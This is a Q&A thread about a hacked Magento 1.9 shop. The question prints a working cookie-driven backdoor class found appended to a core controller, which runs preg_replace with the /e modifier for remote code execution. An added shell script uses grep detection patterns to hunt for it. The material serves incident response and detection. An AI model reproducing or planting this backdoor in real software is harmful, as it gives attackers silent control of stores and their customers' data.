Unknown class Mage_Cms_Auth_xaj found in ../Cms/controllers/IndexController.php - malicious or just bad form?
13-12-2019
Question
I was asked to give some advice on a 1.9.0.1 instance which has had none of the recent SUPEEs installed. SUPEE-1533 went in with no problem, but SUPEE-5344 failed, with a message of
    patching file lib/Varien/Db/Adapter/Pdo/Mysql.php
    Hunk #1 FAILED at 2834.
Investigating the file, I found this code at line 2836:
    if (isset($condition['mhztywsxujkfqokw'])) {
        $fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['mhztywsxujkfqokw']);
        unset($condition['mhztywsxujkfqokw']);
The code in an unmodified lib/Varien/Db/Adapter/Pdo/Mysql.php is:
    if (is_array($condition)) {
        if (isset($condition['field_expr'])) {
            $fieldName = str_replace('#?', $this->quoteIdentifier($fieldName), $condition['field_expr']);
            unset($condition['field_expr']);
        }
A find for "mhztywsxujkfqokw" led me to app/code/core/Mage/Cms/controllers/IndexController.php, where I found this appended to the end of the stock Magento class:
    class Mage_Cms_Auth_xaj
    {
        public function __construct() {
            $auth_cookie = @$_COOKIE['mhztywsxujkfqokw3'];
            if ($auth_cookie) {
                $method = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw2']);
                $auth = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw1']);
                $method("/124/e",$auth,124);
            }
        }
    }
    $is_auth = new Mage_Cms_Auth_xaj;
The class isn't invoked anywhere else, as far as I can see.
I am just wondering - is this something malicious, or a mod that was poorly implemented by editing two core files?
Solution
This is a hack, probably caused by a missing SUPEE-5344 patch. As I see you posted this at the end of September and SUPEE-5344 was released in early 2015, it's very likely your shop got hacked in between.
The stuff you posted seems related to the SUPEE-5344 vulnerability which is described in detail here: http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability
What do you need to do?
I hope it's not too late and you have taken steps to patch and recover your shop in between.
There are most likely a lot of other files which got changed which you just didn't accidentally detect while applying the patch.
A detailed list of steps to recover can be found here: Magento hacked even after applied patch
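Since the answer warns that other files were probably altered too, here is an added example (not code from the question, the answer, or Magento itself) that hunts a Magento 1 tree for the indicators the question describes: the attacker's token, a variable called as a function on cookie input, and a regex literal carrying the /e modifier, plus a check that Mysql.php still reads the stock 'field_expr' key. The sample tree it builds is constructed for the demo; the paths and patterns are my assumptions about what a defender would grep for.

```shell
# Added example, not from the question or answer: hunt for the indicators the
# question describes in a Magento 1 tree, and check the one core file whose
# alteration made the SUPEE-5344 hunk fail.

# Indicator patterns for grep -E:
#  1. the exact token found in the two altered core files
#  2. a variable used as a function name and fed a cookie value, e.g. $f(@$_COOKIE[...])
#  3. a regex literal ending in the /e modifier (preg_replace eval behaviour)
IOC_TOKEN='mhztywsxujkfqokw'
DYN_CALL='\$[A-Za-z_][A-Za-z0-9_]*\(@?\$_COOKIE\['
EVAL_MOD="[\"']/[^\"']*/e[\"']"

# Print file:line:text for every PHP line matching any indicator.
scan_magento_tree() {
    grep -rnIE --include='*.php' -e "$IOC_TOKEN" -e "$DYN_CALL" -e "$EVAL_MOD" "$1"
}

# The stock adapter reads $condition['field_expr']; the hacked copy renamed that
# key, which is why the patch hunk failed. Exit 0 only if the key is still there.
check_mysql_adapter() {
    f="$1/lib/Varien/Db/Adapter/Pdo/Mysql.php"
    [ -f "$f" ] && grep -qF "\$condition['field_expr']" "$f"
}

# Constructed sample tree (not real site data) so the scan can be exercised offline.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/lib/Varien/Db/Adapter/Pdo" "$root/app/code/core/Mage/Cms/controllers"
    cat > "$root/lib/Varien/Db/Adapter/Pdo/Mysql.php" <<'EOF'
<?php
if (isset($condition['mhztywsxujkfqokw'])) {
    unset($condition['mhztywsxujkfqokw']);
}
EOF
    cat > "$root/app/code/core/Mage/Cms/controllers/IndexController.php" <<'EOF'
<?php
$auth = $auth_cookie(@$_COOKIE['mhztywsxujkfqokw1']);
$method("/124/e", $auth, 124);
EOF
    printf '<?php\n$s = preg_replace("/a/", "b", $s);\n' > "$root/clean.php"
    echo "$root"
}

# Usage: sh scan.sh /var/www/magento   (no argument: only define the functions)
if [ "$#" -eq 1 ]; then
    scan_magento_tree "$1"
    check_mysql_adapter "$1" || echo "WARNING: 'field_expr' missing from Mysql.php, core file altered"
fi
```

On the constructed tree the scan reports four lines (two in the adapter, two in the controller) and the adapter check fails; a grep-based sweep like this only finds what you already know to look for, so a diff against a pristine Magento checkout of the same version remains the authoritative integrity check.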